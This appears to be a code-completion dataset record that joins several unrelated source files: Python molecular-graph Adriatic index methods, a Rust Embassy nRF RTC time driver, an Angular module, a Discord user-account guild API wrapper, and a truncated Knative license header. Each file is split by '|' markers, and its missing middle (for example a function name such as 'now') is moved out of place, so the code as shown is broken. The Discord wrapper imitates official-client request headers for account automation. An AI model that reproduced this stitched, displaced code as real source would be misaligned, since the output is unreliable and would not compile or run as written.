return self.adriatic_index(1, 1, 3, 1)
def inverse_sum_losdi_index(self):
""" Adriatic index: inverse sum losdi index"""
return self.adriatic_index(1, 1, 3, 2)
def misbalance_lordi_index(self):
""" Adriatic index: misbalance lordi index"""
return self.adriatic_index(1, 1, 4, 0.5)
def misbalance_lodi_index(self):
""" Adriatic index: misbalance lodi index"""
return self.adriatic_index(1, 1, 4, 1)
def misbalance_losdi_index(self):
""" Adriatic index: misbalance losdi index"""
return self.adriatic_index(1, 1, 4, 2)
def inverse_misbalance_lordi_index(self):
""" Adriatic index: inverse misbalance lordi index"""
return self.adriatic_index(1, 1, 5, 0.5)
def inverse_misbalance_lodi_index(self):
""" Adriatic index: inverse misbalance lodi index"""
return self.adriatic_index(1, 1, 5, 1)
def inverse_misbalance_losdi_index(self):
""" Adriatic index: inverse misbalance losdi index"""
return self.adriatic_index(1, 1, 5, 2)
def min_max_lordi_index(self):
""" Adriatic index: min-max lordi index"""
return self.adriatic_index(1, 1, 6, 0.5)
def min_max_lodi_index(self):
""" Adriatic index: min-max lodi index"""
return self.adriatic_index(1, 1, 6, 1)
def min_max_losdi_index(self):
""" Adriatic index: min-max losdi index"""
return self.adriatic_index(1, 1, 6, 2)
def max_min_lordi_index(self):
""" Adriatic index: max-min lordi index"""
return self.adriatic_index(1, 1, 7, 0.5)
def max_min_lodi_index(self):
""" Adriatic index: max-min lodi index"""
return self.adriatic_index(1, 1, 7, 1)
def max_min_losdi_index(self):
""" Adriatic index: max-min losdi index"""
return self.adriatic_index(1, 1, 7, 2)
def symmetric_division_lordi_index(self):
""" Adriatic index: symmetric division lordi index"""
return self.adriatic_index(1, 1, 8, 0.5)
def symmetric_division_lodi_index(self):
""" Adriatic index: symmetric division lodi index"""
return self.adriatic_index(1, 1, 8, 1)
def symmetric_division_losdi_index(self):
""" Adriatic index: symmetric division losdi index"""
return self.adriatic_index(1, 1, 8, 2)
def randic_type_indi_index(self):
""" Adriatic index: Randic type indi index"""
return self.adriatic_index(1, 2, 1, -1)
def randic_type_irdi_index(self):
""" Adriatic index: Randic type irdi index"""
return self.adriatic_index(1, 2, 1, -0.5)
def randic_type_rodi_index(self):
""" Adriatic index: Randic type rodi index"""
return self.adriatic_index(1, 2, 1, 0.5)
def randic_type_di_index(self):
""" Adriatic index: Randic type di index"""
return self.adriatic_index(1, 2, 1, 1)
def randic_type_sdi_index(self):
""" Adriatic index: Randic type sdi index"""
return self.adriatic_index(1, 2, 1, 2)
def sum_indi_index(self):
""" Adriatic index: sum indi index"""
return self.adriatic_index(1, 2, 2, -1)
def sum_irdi_index(self):
""" Adriatic index: sum irdi index"""
return self.adriatic_index(1, 2, 2, -0.5)
def sum_rodi_index(self):
""" Adriatic index: sum rodi index"""
return self.adriatic_index(1, 2, 2, 0.5)
def sum_di_index(self):
""" Adriatic index: sum di index"""
return self.adriatic_index(1, 2, 2, 1)
def sum_sdi_index(self):
""" Adriatic index: sum sdi index"""
return self.adriatic_index(1, 2, 2, 2)
def inverse_sum_indi_index(self):
""" Adriatic index: inverse sum indi index"""
return self.adriatic_index(1, 2, 3, -1)
def inverse_sum_irdi_index(self):
""" Adriatic index: inverse sum irdi index"""
return self.adriatic_index(1, 2, 3, -0.5)
def inverse_sum_rodi_index(self):
""" Adriatic index: inverse sum rodi index"""
return self.adriatic_index(1, 2, 3, 0.5)
def inverse_sum_di_index(self):
""" Adriatic index: inverse sum di index"""
return self.adriatic_index(1, 2, 3, 1)
def inverse_sum_sdi_index(self):
""" Adriatic index: inverse sum sdi index"""
return self.adriatic_index(1, 2, 3, 2)
def misbalance_indi_index(self):
""" Adriatic index: misbalance indi index"""
return self.adriatic_index(1, 2, 4, -1)
def misbalance_irdi_index(self):
""" Adriatic index: misbalance irdi index"""
return self.adriatic_index(1, 2, 4, -0.5)
def misbalance_rodi_index(self):
""" Adriatic index: misbalance rodi index"""
return self.adriatic_index(1, 2, 4, 0.5)
def misbalance_di_index(self):
""" Adriatic index: misbalance di index"""
return self.adriatic_index(1, 2, 4, 1)
def misbalance_sdi_index(self):
""" Adriatic index: misbalance sdi index"""
return self.adriatic_index(1, 2, 4, 2)
def inverse_misbalance_indi_index(self):
""" Adriatic index: inverse misbalance indi index"""
return self.adriatic_index(1, 2, 5, -1)
def inverse_misbalance_irdi_index(self):
""" Adriatic index: inverse misbalance irdi index"""
return self.adriatic_index(1, 2, 5, -0.5)
def inverse_misbalance_rodi_index(self):
""" Adriatic index: inverse misbalance rodi index"""
return self.adriatic_index(1, 2, 5, 0.5)
def inverse_misbalance_di_index(self):
""" Adriatic index: inverse misbalance di index"""
return self.adriatic_index(1, 2, 5, 1)
def inverse_misbalance_sdi_index(self):
""" Adriatic index: inverse misbalance sdi index"""
return self.adriatic_index(1, 2, 5, 2)
def min_max_rodi_index(self):
""" Adriatic index: min-max rodi index"""
return self.adriatic_index(1, 2, 6, 0.5)
def min_max_di_index(self):
""" Adriatic index: min-max di index"""
return self.adriatic_index(1, 2, 6, 1)
def min_max_sdi_index(self):
""" Adriatic index: min-max sdi index"""
return self.adriatic_index(1, 2, 6, 2)
def max_min_rodi_index(self):
""" Adriatic index: max-min rodi index"""
return self.adriatic_index(1, 2, 7, 0.5)
def max_min_di_index(self):
""" Adriatic index: max-min di index"""
return self.adriatic_index(1, 2, 7, 1)
def max_min_sdi_index(self):
""" Adriatic index: max-min sdi index"""
return self.adriatic_index(1, 2, 7, 2)
def symmetric_division_rodi_index(self):
""" Adriatic index: symmetric division rodi index"""
return self.adriatic_index(1, 2, 8, 0.5)
def symmetric_division_di_index(self):
""" Adriatic index: symmetric division di index"""
return self.adriatic_index(1, 2, 8, 1)
def symmetric_division_sdi_index(self):
""" Adriatic index: symmetric division sdi index"""
return self.adriatic_index(1, 2, 8, 2)
def randic_type_hadi_index(self):
""" Adriatic index: Randic type hadi index"""
return self.adriatic_index(1, 3, 1, 0.5)
def randic_type_twodi_index(self):
""" Adriatic index: Randic type twodi index"""
return self.adriatic_index(1, 3, 1, 2)
def sum_hadi_index(self):
""" Adriatic index: sum hadi index"""
return self.adriatic_index(1, 3, 2, 0.5)
def sum_twodi_index(self):
""" Adriatic index: sum twodi index"""
return self.adriatic_index(1, 3, 2, 2)
def inverse_sum_hadi_index(self):
""" Adriatic index: inverse sum hadi index"""
return self.adriatic_index(1, 3, 3, 0.5)
def inverse_sum_twodi_index(self):
""" Adriatic index: inverse sum twodi index"""
return self.adriatic_index(1, 3, 3, 2)
def misbalance_hadi_index(self):
""" Adriatic index: misbalance hadi index"""
return self.adriatic_index(1, 3, 4, 0.5)
def misbalance_twodi_index(self):
""" Adriatic index: misbalance twodi index"""
return self.adriatic_index(1, 3, 4, 2)
def inverse_misbalance_hadi_index(self):
""" Adriatic index: inverse misbalance hadi index"""
return self.adriatic_index(1, 3, 5, 0.5)
def inverse_misbalance_twodi_index(self):
""" Adriatic index: inverse misbalance twodi index"""
return self.adriatic_index(1, 3, 5, 2)
def min_max_hadi_index(self):
""" Adriatic index: min-max hadi index"""
return self.adriatic_index(1, 3, 6, 0.5)
def min_max_twodi_index(self):
""" Adriatic index: min-max twodi index"""
return self.adriatic_index(1, 3, 6, 2)
def max_min_hadi_index(self):
""" Adriatic index: max-min hadi index"""
return self.adriatic_index(1, 3, 7, 0.5)
def max_min_twodi_index(self):
""" Adriatic index: max-min twodi index"""
return self.adriatic_index(1, 3, 7, 2)
def symmetric_division_hadi_index(self):
""" Adriatic index: symmetric division hadi index"""
return self.adriatic_index(1, 3, 8, 0.5)
def symmetric_division_twodi_index(self):
""" Adriatic index: symmetric division twodi index"""
return self.adriatic_index(1, 3, 8, 2) | |
time_driver.rs | use core::cell::Cell;
use core::sync::atomic::{compiler_fence, AtomicU32, AtomicU8, Ordering};
use core::{mem, ptr};
use critical_section::CriticalSection;
use embassy::blocking_mutex::raw::CriticalSectionRawMutex;
use embassy::blocking_mutex::CriticalSectionMutex as Mutex;
use embassy::time::driver::{AlarmHandle, Driver};
use crate::interrupt::{Interrupt, InterruptExt};
use crate::{interrupt, pac};
fn rtc() -> &'static pac::rtc0::RegisterBlock {
unsafe { &*pac::RTC1::ptr() }
}
/// Calculate the timestamp from the period count and the tick count.
///
/// The RTC counter is 24 bit. Ticking at 32768hz, it overflows every ~8 minutes. This is
/// too short. We must make it "never" overflow.
///
/// The obvious way would be to count overflow periods. Every time the counter overflows,
/// increase a `periods` variable. `now()` simply does `periods << 24 + counter`. So, the logic
/// around an overflow would look like this:
///
/// ```not_rust
/// periods = 1, counter = 0xFF_FFFE --> now = 0x1FF_FFFE
/// periods = 1, counter = 0xFF_FFFF --> now = 0x1FF_FFFF
/// **OVERFLOW**
/// periods = 2, counter = 0x00_0000 --> now = 0x200_0000
/// periods = 2, counter = 0x00_0001 --> now = 0x200_0001
/// ```
///
/// The problem is this is vulnerable to race conditions if `now()` runs at the exact time an
/// overflow happens.
///
/// If `now()` reads `periods` first and `counter` later, and overflow happens between the reads,
/// it would return a wrong value:
///
/// ```not_rust
/// periods = 1 (OLD), counter = 0x00_0000 (NEW) --> now = 0x100_0000 -> WRONG
/// ```
///
/// It fails similarly if it reads `counter` first and `periods` second.
///
/// To fix this, we define a "period" to be 2^23 ticks (instead of 2^24). One "overflow cycle" is 2 periods.
///
/// - `period` is incremented on overflow (at counter value 0)
/// - `period` is incremented "midway" between overflows (at counter value 0x80_0000)
///
/// Therefore, when `period` is even, counter is in 0..0x7f_ffff. When odd, counter is in 0x80_0000..0xFF_FFFF
/// This allows for now() to return the correct value even if it races an overflow.
///
/// To get `now()`, `period` is read first, then `counter` is read. If the counter value matches
/// the expected range for the `period` parity, we're done. If it doesn't, this means that
/// a new period start has raced us between reading `period` and `counter`, so we assume the `counter` value
/// corresponds to the next period.
///
/// `period` is a 32bit integer, so It overflows on 2^32 * 2^23 / 32768 seconds of uptime, which is 34865
/// years. For comparison, flash memory like the one containing your firmware is usually rated to retain
/// data for only 10-20 years. 34865 years is long enough!
fn calc_now(period: u32, counter: u32) -> u64 {
((period as u64) << 23) + ((counter ^ ((period & 1) << 23)) as u64)
}
fn compare_n(n: usize) -> u32 {
1 << (n + 16)
}
#[cfg(tests)]
mod test {
use super::*;
#[test]
fn test_calc_now() {
assert_eq!(calc_now(0, 0x000000), 0x0_000000);
assert_eq!(calc_now(0, 0x000001), 0x0_000001);
assert_eq!(calc_now(0, 0x7FFFFF), 0x0_7FFFFF);
assert_eq!(calc_now(1, 0x7FFFFF), 0x1_7FFFFF);
assert_eq!(calc_now(0, 0x800000), 0x0_800000);
assert_eq!(calc_now(1, 0x800000), 0x0_800000);
assert_eq!(calc_now(1, 0x800001), 0x0_800001);
assert_eq!(calc_now(1, 0xFFFFFF), 0x0_FFFFFF);
assert_eq!(calc_now(2, 0xFFFFFF), 0x1_FFFFFF);
assert_eq!(calc_now(1, 0x000000), 0x1_000000);
assert_eq!(calc_now(2, 0x000000), 0x1_000000);
}
}
struct AlarmState {
timestamp: Cell<u64>,
// This is really a Option<(fn(*mut ()), *mut ())>
// but fn pointers aren't allowed in const yet
callback: Cell<*const ()>,
ctx: Cell<*mut ()>,
}
unsafe impl Send for AlarmState {}
impl AlarmState {
const fn new() -> Self {
Self {
timestamp: Cell::new(u64::MAX),
callback: Cell::new(ptr::null()),
ctx: Cell::new(ptr::null_mut()),
}
}
}
const ALARM_COUNT: usize = 3;
struct RtcDriver {
/// Number of 2^23 periods elapsed since boot.
period: AtomicU32,
alarm_count: AtomicU8,
/// Timestamp at which to fire alarm. u64::MAX if no alarm is scheduled.
alarms: Mutex<[AlarmState; ALARM_COUNT]>,
}
const ALARM_STATE_NEW: AlarmState = AlarmState::new();
embassy::time_driver_impl!(static DRIVER: RtcDriver = RtcDriver {
period: AtomicU32::new(0),
alarm_count: AtomicU8::new(0),
alarms: Mutex::const_new(CriticalSectionRawMutex::new(), [ALARM_STATE_NEW; ALARM_COUNT]),
});
impl RtcDriver {
fn init(&'static self, irq_prio: crate::interrupt::Priority) {
let r = rtc();
r.cc[3].write(|w| unsafe { w.bits(0x800000) });
r.intenset.write(|w| {
let w = w.ovrflw().set();
let w = w.compare3().set();
w
});
r.tasks_clear.write(|w| unsafe { w.bits(1) });
r.tasks_start.write(|w| unsafe { w.bits(1) });
// Wait for clear
while r.counter.read().bits() != 0 {}
let irq = unsafe { interrupt::RTC1::steal() };
irq.set_priority(irq_prio);
irq.enable();
}
fn on_interrupt(&self) {
let r = rtc();
if r.events_ovrflw.read().bits() == 1 {
r.events_ovrflw.write(|w| w);
self.next_period();
}
if r.events_compare[3].read().bits() == 1 {
r.events_compare[3].write(|w| w);
self.next_period();
}
for n in 0..ALARM_COUNT {
if r.events_compare[n].read().bits() == 1 {
r.events_compare[n].write(|w| w);
critical_section::with(|cs| {
self.trigger_alarm(n, cs);
})
}
}
}
fn next_period(&self) {
critical_section::with(|cs| {
let r = rtc();
let period = self.period.fetch_add(1, Ordering::Relaxed) + 1;
let t = (period as u64) << 23;
for n in 0..ALARM_COUNT {
let alarm = &self.alarms.borrow(cs)[n];
let at = alarm.timestamp.get();
if at < t + 0xc00000 {
// just enable it. `set_alarm` has already set the correct CC val.
r.intenset.write(|w| unsafe { w.bits(compare_n(n)) });
}
}
})
}
fn get_alarm<'a>(&'a self, cs: CriticalSection<'a>, alarm: AlarmHandle) -> &'a AlarmState {
// safety: we're allowed to assume the AlarmState is created by us, and
// we never create one that's out of bounds.
unsafe { self.alarms.borrow(cs).get_unchecked(alarm.id() as usize) }
}
fn trigger_alarm(&self, n: usize, cs: CriticalSection) {
let r = rtc();
r.intenclr.write(|w| unsafe { w.bits(compare_n(n)) });
let alarm = &self.alarms.borrow(cs)[n];
alarm.timestamp.set(u64::MAX);
// Call after clearing alarm, so the callback can set another alarm.
// safety:
// - we can ignore the possiblity of `f` being unset (null) because of the safety contract of `allocate_alarm`.
// - other than that we only store valid function pointers into alarm.callback
let f: fn(*mut ()) = unsafe { mem::transmute(alarm.callback.get()) };
f(alarm.ctx.get());
}
}
impl Driver for RtcDriver {
fn | (&self) -> u64 {
// `period` MUST be read before `counter`, see comment at the top for details.
let period = self.period.load(Ordering::Relaxed);
compiler_fence(Ordering::Acquire);
let counter = rtc().counter.read().bits();
calc_now(period, counter)
}
unsafe fn allocate_alarm(&self) -> Option<AlarmHandle> {
let id = self.alarm_count.fetch_update(Ordering::AcqRel, Ordering::Acquire, |x| {
if x < ALARM_COUNT as u8 {
Some(x + 1)
} else {
None
}
});
match id {
Ok(id) => Some(AlarmHandle::new(id)),
Err(_) => None,
}
}
fn set_alarm_callback(&self, alarm: AlarmHandle, callback: fn(*mut ()), ctx: *mut ()) {
critical_section::with(|cs| {
let alarm = self.get_alarm(cs, alarm);
alarm.callback.set(callback as *const ());
alarm.ctx.set(ctx);
})
}
fn set_alarm(&self, alarm: AlarmHandle, timestamp: u64) {
critical_section::with(|cs| {
let n = alarm.id() as _;
let alarm = self.get_alarm(cs, alarm);
alarm.timestamp.set(timestamp);
let t = self.now();
// If alarm timestamp has passed, trigger it instantly.
if timestamp <= t {
self.trigger_alarm(n, cs);
return;
}
let r = rtc();
// If it hasn't triggered yet, setup it in the compare channel.
// Write the CC value regardless of whether we're going to enable it now or not.
// This way, when we enable it later, the right value is already set.
// nrf52 docs say:
// If the COUNTER is N, writing N or N+1 to a CC register may not trigger a COMPARE event.
// To workaround this, we never write a timestamp smaller than N+3.
// N+2 is not safe because rtc can tick from N to N+1 between calling now() and writing cc.
//
// It is impossible for rtc to tick more than once because
// - this code takes less time than 1 tick
// - it runs with interrupts disabled so nothing else can preempt it.
//
// This means that an alarm can be delayed for up to 2 ticks (from t+1 to t+3), but this is allowed
// by the Alarm trait contract. What's not allowed is triggering alarms *before* their scheduled time,
// and we don't do that here.
let safe_timestamp = timestamp.max(t + 3);
r.cc[n].write(|w| unsafe { w.bits(safe_timestamp as u32 & 0xFFFFFF) });
let diff = timestamp - t;
if diff < 0xc00000 {
r.intenset.write(|w| unsafe { w.bits(compare_n(n)) });
} else {
// If it's too far in the future, don't setup the compare channel yet.
// It will be setup later by `next_period`.
r.intenclr.write(|w| unsafe { w.bits(compare_n(n)) });
}
})
}
}
#[interrupt]
fn RTC1() {
DRIVER.on_interrupt()
}
pub(crate) fn init(irq_prio: crate::interrupt::Priority) {
DRIVER.init(irq_prio)
}
| now |
app.module.ts | import { BrowserModule } from '@angular/platform-browser';
import { NgModule } from '@angular/core';
import { FormsModule } from '@angular/forms';
import { HttpModule } from '@angular/http';
import { routing } from './app.routing';
import { masterFirebaseConfig } from './api-keys';
import { AngularFireModule } from 'angularfire2';
import { AngularFireDatabaseModule } from 'angularfire2/database';
import { AppComponent } from './app.component';
import { AboutComponent } from './about/about.component';
import { WelcomeComponent } from './welcome/welcome.component';
import { ActorsComponent } from './actors/actors.component';
import { ActorDetailComponent } from './actor-detail/actor-detail.component';
import { AdminComponent } from './admin/admin.component';
import { EditActorComponent } from './edit-actor/edit-actor.component';
import { ContactComponent } from './contact/contact.component';
import { ArtisticTeamComponent } from './artistic-team/artistic-team.component';
export const firebaseConfig = {
apiKey: masterFirebaseConfig.apiKey,
authDomain: masterFirebaseConfig.authDomain,
databaseURL: masterFirebaseConfig.databaseURL,
storageBucket: masterFirebaseConfig.storageBucket
};
@NgModule({
declarations: [
AppComponent,
AboutComponent,
WelcomeComponent,
ActorsComponent,
ActorDetailComponent,
AdminComponent,
EditActorComponent,
ContactComponent,
ArtisticTeamComponent
],
imports: [
BrowserModule,
FormsModule,
HttpModule,
routing,
AngularFireModule.initializeApp(firebaseConfig),
AngularFireDatabaseModule
],
providers: [],
bootstrap: [AppComponent]
})
export class | { }
| AppModule |
guild.py | from ..RESTapiwrap import Wrapper
from ..utils.permissions import PERMS, Permissions
from ..utils.contextproperties import ContextProperties
import time
import base64
try:
from urllib.parse import quote
except ImportError:
from urllib import quote
class Guild(object):
__slots__ = ['discord', 's', 'log']
def __init__(self, discord, s, log): #s is the requests session object
self.discord = discord
self.s = s
self.log = log
'''
invite codes / server info
'''
#get guild info from invite code
def getInfoFromInviteCode(self, inviteCode, with_counts, with_expiration, fromJoinGuildNav):
|
#just the join guild endpoint, default location mimics joining a guild from the ([+]Add a Server) button
def joinGuildRaw(self, inviteCode, guild_id=None, channel_id=None, channel_type=None, location="join guild"):
url = self.discord+"invites/"+inviteCode
if location in ("accept invite page", "join guild"):
return Wrapper.sendRequest(self.s, 'post', url, {}, headerModifications={"update":{"X-Context-Properties":ContextProperties.get(location, guild_id=guild_id, channel_id=channel_id, channel_type=channel_type)}}, log=self.log)
elif location == "markdown":
return Wrapper.sendRequest(self.s, 'post', url, {}, headerModifications={"update":{"X-Context-Properties":ContextProperties.get("markdown")}}, log=self.log)
def joinGuild(self, inviteCode, location, wait):
location = location.lower()
if location in ("accept invite page", "join guild"):
guildData = self.getInfoFromInviteCode(inviteCode, with_counts=True, with_expiration=True, fromJoinGuildNav=(location.lower()=="join guild")).json()
if wait: time.sleep(wait)
return self.joinGuildRaw(inviteCode, guildData["guild"]["id"], guildData["channel"]["id"], guildData["channel"]["type"], location)
elif location == "markdown":
return self.joinGuildRaw(inviteCode, location="markdown")
def previewGuild(self, guildID, sessionID):
url = self.discord+"guilds/"+guildID+"/members/@me?lurker=true"
if sessionID != None:
url += "&session_id="+sessionID
return Wrapper.sendRequest(self.s, 'put', url, headerModifications={"update":{"X-Context-Properties":"e30="}}, log=self.log)
def leaveGuild(self, guildID, lurking):
url = self.discord+"users/@me/guilds/"+guildID
body = {"lurking": lurking}
return Wrapper.sendRequest(self.s, 'delete', url, body, log=self.log)
def createInvite(self, channelID, max_age_seconds, max_uses, grantTempMembership, checkInvite, targetType): #has to be a channel thats in a guild. also checkInvite and targetType are basically useless.
url = self.discord+"channels/"+channelID+"/invites"
if max_age_seconds == False:
max_age_seconds = 0
if max_uses == False:
max_uses = 0
body = {"max_age": max_age_seconds, "max_uses": max_uses, "temporary": grantTempMembership}
if checkInvite != "":
body["validate"] = checkInvite
if targetType != "":
body["target_type"] = targetType
return Wrapper.sendRequest(self.s, 'post', url, body, headerModifications={"update":{"X-Context-Properties":ContextProperties.get("guild header")}}, log=self.log)
def deleteInvite(self, inviteCode):
url = self.discord+'invites/'+inviteCode
return Wrapper.sendRequest(self.s, 'delete', url, log=self.log)
def getGuildInvites(self, guildID):
url = self.discord+'guilds/'+guildID+'/invites'
return Wrapper.sendRequest(self.s, 'get', url, log=self.log)
def getChannelInvites(self, channelID):
url = self.discord+'channels/'+channelID+'/invites'
return Wrapper.sendRequest(self.s, 'get', url, log=self.log)
def getGuilds(self, with_counts):
url = self.discord+"users/@me/guilds"
if with_counts != None:
url += "?with_counts="+repr(with_counts).lower()
headerMods = {"update":{"X-Track":self.s.headers.get("X-Super-Properties")}, "remove":["X-Super-Properties"]}
return Wrapper.sendRequest(self.s, 'get', url, headerModifications=headerMods, log=self.log)
def getGuildChannels(self, guildID):
url = self.discord+'guilds/'+guildID+'/channels'
headerMods = {"update":{"X-Track":self.s.headers.get("X-Super-Properties")}, "remove":["X-Super-Properties"]}
return Wrapper.sendRequest(self.s, 'get', url, headerModifications=headerMods, log=self.log)
def getDiscoverableGuilds(self, offset, limit):
url = self.discord+"discoverable-guilds?offset="+repr(offset)+"&limit="+repr(limit)
return Wrapper.sendRequest(self.s, 'get', url, log=self.log)
def getGuildRegions(self, guildID):
url = self.discord+'guilds/'+guildID+'/regions'
return Wrapper.sendRequest(self.s, 'get', url, log=self.log)
'''
server moderation and management
'''
#create a guild
def createGuild(self, name, icon, channels, systemChannelID, template):
url = self.discord+"guilds"
body = {"name": name, "icon":icon, "channels":channels, "system_channel_id":systemChannelID, "guild_template_code":template}
if icon != None:
with open(icon, "rb") as image:
encodedImage = base64.b64encode(image.read()).decode('utf-8')
body["icon"] = "data:image/png;base64,"+encodedImage
return Wrapper.sendRequest(self.s, 'post', url, body, log=self.log)
#delete a guild (assuming you are the owner)
def deleteGuild(self, guildID):
url = self.discord+"guilds/%s/delete" % (guildID)
body = {}
return Wrapper.sendRequest(self.s, 'post', url, body, log=self.log)
#kick a user
def kick(self, guildID, userID, reason):
url = self.discord+"guilds/%s/members/%s?reason=%s" % (guildID, userID, quote(reason))
headerMods = {"update":{"X-Audit-Log-Reason":reason}} if reason=="" else {}
return Wrapper.sendRequest(self.s, 'delete', url, headerModifications=headerMods, log=self.log)
#ban a user
def ban(self, guildID, userID, deleteMessagesDays, reason):
url = self.discord+"guilds/%s/bans/%s" % (guildID, userID)
body = {"delete_message_days": str(deleteMessagesDays), "reason": reason}
headerMods = {"update":{"X-Audit-Log-Reason":reason}} if reason=="" else {}
return Wrapper.sendRequest(self.s, 'put', url, body, headerModifications=headerMods, log=self.log)
def revokeBan(self, guildID, userID):
url = self.discord+"guilds/"+guildID+"/bans/"+userID
return Wrapper.sendRequest(self.s, 'delete', url, log=self.log)
#lookup a user in a guild. thx Echocage for finding this api endpoint
'''
removed as this is a bot-only request. Use bot.gateway.checkGuildMembers instead.
def getGuildMember(self, guildID, userID):
url = self.discord+"guilds/%s/members/%s" % (guildID, userID)
return Wrapper.sendRequest(self.s, 'get', url, log=self.log)
'''
def getRoleMemberCounts(self, guildID):
url = self.discord+"guilds/"+guildID+"/roles/member-counts"
return Wrapper.sendRequest(self.s, 'get', url, log=self.log)
def getGuildIntegrations(self, guildID, include_applications):
url = self.discord+"guilds/"+guildID+"/integrations"
if include_applications != None:
url += "?include_applications="+repr(include_applications).lower()
return Wrapper.sendRequest(self.s, 'get', url, log=self.log)
def getGuildTemplates(self, guildID):
url = self.discord+"guilds/"+guildID+"/templates"
return Wrapper.sendRequest(self.s, 'get', url, log=self.log)
def getRoleMemberIDs(self, guildID, roleID):
url = self.discord+"guilds/"+guildID+"/roles/"+roleID+"/member-ids"
return Wrapper.sendRequest(self.s, 'get', url, log=self.log)
def addMembersToRole(self, guildID, roleID, memberIDs):
if isinstance(memberIDs, str):
memberIDs = [memberIDs]
url = self.discord+"guilds/"+guildID+"/roles/"+roleID+"/members"
body = {"member_ids":memberIDs}
return Wrapper.sendRequest(self.s, 'patch', url, body, log=self.log)
def setMemberRoles(self, guildID, memberID, roleIDs):
if isinstance(roleIDs, str):
roleIDs = [roleIDs]
url = self.discord+"guilds/"+guildID+"/members/"+memberID
body = {"roles": roleIDs}
return Wrapper.sendRequest(self.s, 'patch', url, body, log=self.log)
'''
other stuff
'''
#get member verification data
def getMemberVerificationData(self, guildID, with_guild, invite_code):
url = self.discord+"guilds/"+guildID+"/member-verification?with_guild="+str(with_guild).lower()
if invite_code != None:
url += "&invite_code="+invite_code
return Wrapper.sendRequest(self.s, 'get', url, log=self.log)
def agreeGuildRules(self, guildID, form_fields, version):
url = self.discord+"guilds/"+guildID+"/requests/@me"
form_fields[0]['response'] = True
body = {"version":version, "form_fields":form_fields}
return Wrapper.sendRequest(self.s, 'put', url, body, log=self.log)
### threads
#create thread
def createThread(self, channelID, name, messageID, public, archiveAfter):
url = self.discord+"channels/"+channelID
if messageID:
url += "/messages/"+messageID
url += "/threads"
choice = archiveAfter.lower()
if choice == '1 hour':
archiveAfterSeconds = 60
elif choice in ('24 hour', '24 hours', '1 day'):
archiveAfterSeconds = 1440
elif choice in ('3 day', '3 days'):
archiveAfterSeconds = 4320
elif choice in ('1 week', '7 day', '7 days'):
archiveAfterSeconds = 10080
threadType = 11 if public else 12
body = {"name": name, "type": threadType, "auto_archive_duration": archiveAfterSeconds}
return Wrapper.sendRequest(self.s, 'post', url, body, log=self.log)
#leave thread
def leaveThread(self, threadID, location):
url = self.discord+"channels/"+threadID+"/thread-members/@me?location="+quote(location)
return Wrapper.sendRequest(self.s, 'delete', url, log=self.log)
#join thread
def joinThread(self, threadID, location):
url = self.discord+"channels/"+threadID+"/thread-members/@me?location="+quote(location)
return Wrapper.sendRequest(self.s, 'post', url, log=self.log)
#archive thread
def archiveThread(self, threadID, lock):
url = self.discord+"channels/"+threadID
body = {"archived": True, "locked": lock}
return Wrapper.sendRequest(self.s, 'patch', url, body, log=self.log)
#unarchive thread
def unarchiveThread(self, threadID, lock):
url = self.discord+"channels/"+threadID
body = {"archived": False, "locked": lock}
return Wrapper.sendRequest(self.s, 'patch', url, body, log=self.log)
'''
other
'''
#lookup school
def lookupSchool(self, email, allowMultipleGuilds, useVerificationCode):
url = self.discord+"guilds/automations/email-domain-lookup"
body = {"email":email,"allow_multiple_guilds":allowMultipleGuilds}
if useVerificationCode != None:
body["use_verification_code"] = useVerificationCode
return Wrapper.sendRequest(self.s, 'post', url, body, log=self.log)
#https://discord.com/channels/hubID/mainChannelID
def schoolHubWaitlistSignup(self, email, school):
url = self.discord+"hub-waitlist/signup"
body = {"email":email,"school":school}
return Wrapper.sendRequest(self.s, 'post', url, body, log=self.log)
def schoolHubSignup(self, email, hubID):
url = self.discord+'guilds/automations/email-domain-lookup'
body = {"email":email,"guild_id":hubID,"allow_multiple_guilds":True,"use_verification_code":True}
return Wrapper.sendRequest(self.s, 'post', url, body, log=self.log)
def verifySchoolHubSignup(self, hubID, email, code):
url = self.discord+'guilds/automations/email-domain-lookup/verify-code'
body = {"code":code,"guild_id":hubID,"email":email}
return Wrapper.sendRequest(self.s, 'post', url, body, log=self.log)
def getSchoolHubGuilds(self, hubID): #note, the "entity_id" returned in each entry is the guildID
url = self.discord+'channels/'+hubID+'/directory-entries' #ik it says channels, but it's the hubID/"guildID".
return Wrapper.sendRequest(self.s, 'get', url, log=self.log)
def getSchoolHubDirectoryCounts(self, hubID): #this only returns the # of guilds/groups in each directory/category. This doesn't even return the category names
url = self.discord+'channels/'+hubID+'/directory-entries/counts'
return Wrapper.sendRequest(self.s, 'get', url, log=self.log)
def joinGuildFromSchoolHub(self, hubID, guildID):
url = self.discord+'guilds/'+guildID+'/members/@me?lurker=false&directory_channel_id='+hubID
headerMods = {"update":{"X-Context-Properties":ContextProperties.get("school hub guild")}}
return Wrapper.sendRequest(self.s, 'put', url, headerModifications=headerMods, log=self.log)
def searchSchoolHub(self, hubID, query):
url = self.discord+'channels/'+hubID+'/directory-entries/search?query='+query
return Wrapper.sendRequest(self.s, 'get', url, log=self.log)
def getMySchoolHubGuilds(self, hubID): #or guilds you own that can potentially be added to the hub
url = self.discord+'channels/'+hubID+'/directory-entries/list'
return Wrapper.sendRequest(self.s, 'get', url, log=self.log)
def setSchoolHubGuildDetails(self, hubID, guildID, description, directoryID): #directoryID (int) is not a snowflake
url = self.discord+'channels/'+hubID+'/directory-entry/'+guildID
body = {"description":description,"primary_category_id":directoryID}
return Wrapper.sendRequest(self.s, 'post', url, body, log=self.log)
def getLiveStages(self, extra):
url = self.discord+'stage-instances'
if extra:
url += '/extra'
return Wrapper.sendRequest(self.s, 'get', url, log=self.log)
#the only time this is observed in the client is in a guild
def getChannel(self, channelID):
url = self.discord+'channels/'+channelID
return Wrapper.sendRequest(self.s, 'get', url, log=self.log)
def getGuildActivitiesConfig(self, guildID):
url = self.discord+'activities/guilds/'+guildID+'/config'
return Wrapper.sendRequest(self.s, 'get', url, log=self.log)
| url = self.discord+"invites/"+inviteCode
if (with_counts!=None or with_expiration!=None or fromJoinGuildNav):
url += "?"
data = {}
if fromJoinGuildNav:
data["inputValue"] = inviteCode
if with_counts != None:
data["with_counts"] = with_counts
if with_expiration != None:
data["with_expiration"] = with_expiration
url += "&".join( "%s=%s" % (k, quote(repr(data[k]).lower())) for k in data)
return Wrapper.sendRequest(self.s, 'get', url, log=self.log) |
fake_apiserversource.go | /*
Copyright 2021 The Knative Authors
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
